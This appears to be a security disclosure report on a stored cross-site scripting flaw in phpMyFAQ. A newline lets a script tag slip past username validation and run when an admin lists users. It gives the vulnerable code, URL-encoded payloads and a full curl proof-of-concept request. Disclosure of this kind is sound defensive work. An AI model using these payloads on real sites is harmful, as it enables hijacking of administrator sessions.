There is a stored XSS vulnerability due to improper sanitization of usernames. Vulnerable code User.php
line 532:
public function isValidLogin(string $login): bool
{
$login = (string)$login;
if (strlen($login) < $this->loginMinLength || !preg_match($this->validUsername, $login)) {
$this->errors[] = self::ERROR_USER_LOGIN_INVALID;
return false;
}
return true;
}
This code performs a loose filtering on $login
parameter due to the use of preg_match
function. The preg_match
function only validates the first line of user-input. I.e. content after newline isn’t validated at all. Meaning that <script>alert(1)</script>
is an invalid username but pwn <script>alert(1)</script>
is a perfectly valid username. Or in URL encoded form: pwn%0A%3Cscript%3Ealert(1)%3C/script%3E
.
Because of this, attackers can supply URL encoded XSS payloads which would bypass the filter such as:
realname=pwn%0A%3Cscript%3Ealert(1)%3C/script%3E&name=pwn%0A%3Cscript%3Ealert(1)%3C/script%3
Later on, the user with a malicious username is inserted into the database.
Finally, whenever admin user visits “List User page”. E.g. https://172-105-72-245.ip.linodeusercontent.com/phpmyfaq/admin/?action=user&user_action=listallusers
the admin/user.php
file is executed and attacker supplied input is interpolated into the DOM without any sanitization: <td><?= $user->getLogin() ?></td>
PoC:
Issue the following request to create a user with a username of pwn\n<script>alert(1)</script>
:
curl -i -s -k -X $'POST' \
-H $'Host: 172-105-72-245.ip.linodeusercontent.com' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:106.0) Gecko/20100101 Firefox/106.0' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Content-Length: 137' -H $'Connection: close' \
--data-binary $'lang=en&realname=pwn%0A%3Cscript%3Ealert(1)%3C/script%3E&name=pwn%0A%3Cscript%3Ealert(1)%3C/script%3E&email=kali%40kali.com&is_visible=on' \
$'https://172-105-72-245.ip.linodeusercontent.com/phpmyfaq/ajaxservice.php?action=saveregistration'
Now visit the “List all users page”: https://172-105-72-245.ip.linodeusercontent.com/phpmyfaq/admin/?action=user&user_action=listallusers
XSS Payload will be triggered.
Please see occurrences section for a second Unauthenticated stored XSS vulnerability via name
parameter.